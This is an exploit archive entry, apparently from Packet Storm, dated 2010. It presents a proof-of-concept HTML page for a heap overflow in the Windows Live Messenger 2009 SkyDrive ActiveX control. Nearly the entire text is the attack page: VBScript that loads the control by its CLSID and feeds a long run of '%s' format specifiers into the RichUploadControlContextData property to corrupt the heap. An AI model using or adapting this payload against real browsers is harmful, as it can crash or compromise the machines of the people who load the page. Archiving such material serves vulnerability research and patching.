Windows Live Messenger 2009 Active-X Heap Overflow

2010-01-22T00:00:00
ID PACKETSTORM:85514
Type packetstorm
Reporter sarbot511
Modified 2010-01-22T00:00:00

Description

                                        
                                            `#Aouther : [SarBoT511] (xs3@hotmail.com)  
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]  
#downloads :[http://download.live.com/]  
#Date : [2010/01/21]  
#tested on :[windows 7 & Vista & Xp sp3]  
#Windows Live Messenger SkyDrive 2009  
  
<html>  
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Windows Live SkyDrive\Microsoft.Live.Folders.RichUpload.3.dll"  
prototype = "Property Let RichUploadControlContextData As String"  
memberName = "RichUploadControlContextData"  
progid = "RichUploadLib.UploadControl"  
argCount = 1  
  
arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"  
  
target.RichUploadControlContextData = arg1  
  
</script>  
  
`